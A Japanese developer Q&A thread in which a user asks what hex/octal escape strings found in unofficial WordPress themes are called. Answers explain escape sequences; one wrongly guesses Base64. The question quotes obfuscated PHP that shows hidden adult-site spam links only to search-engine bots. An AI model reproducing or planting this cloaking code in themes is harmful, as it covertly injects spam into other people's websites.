質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.48%
WordPress

WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

Q&A

解決済

3回答

2094閲覧

野良のWordPressテーマに混じり込んでいる \x72\145\147 などの文字列の呼び名

forsb

総合スコア52

WordPress

WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

0グッド

0クリップ

投稿2015/04/21 05:38

公式ではない野良で配布されているWordPressテーマに時折こういったエスケープ(?)された文字列が見られます。(もちろんろくでもない中身であることは知っています。)

こういった文字列はなんと呼べばいいのでしょうか。呼び名がわからないと調べる時にこまるので教えて下さい。

以下は実際に埋めらていたコードです。

<?php $x0d="p\x72\145\147\137\155\141\164\143h"; $x0b = $_SERVER['HTTP_USER_AGENT'];$x0c="\040\015\x0a\x0d\012\x20\040\x20\x20\x20\x20\x20 <a\x20\150\162\x65\146='\x20\x20\x68\x74\164p\072\x2f/ww\x77\056s\145x-\143\150\x61\164\x2d\x6fnl\151\156e\056\143\157\x6d\x20 \040 '\x3e\040 s\x65x\040\143ha\x74 \x3c\x2fa>\x20<\142r\x2f>\015 \040 \x20\x20\040\x20\040\040\x3ca h\162\145f\075'\040\x20\150\164\x74\160\072\x2f\x2f\x77w\x77.\x73ex-\x63h\x61\164\055o\156\154\151\x6e\x65\056c\157\x6d '\x3e\040\x6c\x69\x76\x65\040\x73e\x78 c\x68\141\x74\074\057\x61\x3e \x0a\x09\x09"; if ($x0d('*bot*', $x0b)) { echo $x0c;} else {echo '';}?><?php $x0d="pr\x65\x67_\x6d\x61\164c\x68"; $x0b = $_SERVER['HTTP_USER_AGENT']; $x0c="\x20<\141\040\x68\x72\x65\146\x3d'\x68\x74tp\x3a\x2f/ww\167.\163e\170-\143\150a\164\055on\x6cin\x65\x2ec\x6f\x6d/\154\x69v\x65\x2d\x73\x65\x78\055\x63h\x61\x74\163/\162\x65\144-\150\x61\151\162\055\143\141\155\055\147\x69\x72\x6cs\x20 \x20\162\145\x64h\x65\x61\144 s\145\170\040cha\x74\040\x6c\x69\x76e \x6f\156l\x69\x6e\x65 p\162\x69v\x61te\040\x72o\157\155\163\015\012\074\057a> "; if ($x0d('*bot*', $x0b)) { echo $x0c; } else { echo'';}?><?php $x0d="pr\145g_\155at\143\150"; $x0b = $_SERVER['HTTP_USER_AGENT']; $x0c="\x20\074a\040\x68\162e\x66\075'\150t\164\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x76\x69\x64e\x6f\055\143h\x61t-s\145x.\143\157\155/l\151\166\145\055\163ex-c\x68a\x74\x73/\150ug\145\055t\151ts\055\x63\x61\x6d\x2d\147i\162l\x73\040'> \150\165\x67\x65\x20\x74it\163\040gir\154\163 \x76\x69\144\x65\157ch\141\164\040\163ex\015\x0a\074/\141\076\040"; if ($x0d('*bot*', $x0b)) { echo $x0c; } else { echo'';}?>

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

guest

回答3

0

ベストアンサー

「エスケープシーケンス」とかいいます。代表的な言語だとサポートされているとのこと。
http://en.wikipedia.org/wiki/Escape_sequence#Programming_languages

PHPのドキュメントだとココあたり
http://php.net/manual/ja/language.types.string.php#language.types.string.syntax.double

エスケープシーケンスにもいろんな種類があるので、こんな変換ページが便利です。
http://0xcc.net/jsescape/

特に「\x」で始まるものを指す場合は、Hex Escape Sequence とか hexadecimal escape sequence と呼べばよさそうです。

投稿2015/04/21 06:16

matobaa

総合スコア2493

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

forsb

2015/04/21 07:52

参考リンクまで添えていただきありがとうございます。 大変勉強になりました。
matobaa

2015/04/21 12:09

ちょっと読み直したら誤解がありそうなので、念のため補足します。 「\x などを先行させて別の文字を表現する」ことをエスケープといい、 「\x などを先行させる表現方法」をエスケープシーケンスといい、 「\x99\x99 のような文字列」は、厳密にいえば「エスケープシーケンスを組み合わせた文字列」ということになります。 つまり、文字列そのものをエスケープシーケンスと呼ぶのではなく、あくまで \x99 という組み合わせがエスケープシーケンスです。念のため。
guest

0

16進数に変換された文字列のようですね
簡単なプログラムを書いたり、下記リンクのようなサービスを利用すると、読み取ることができます

Links

投稿2015/04/21 06:30

編集2015/06/05 09:14
gouf

総合スコア2321

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

0

Base64のデータなのでしょうか…
例:画像をBase64化して、php側で画像に復元など・・・

投稿2015/04/21 06:04

shu21

総合スコア106

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.48%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問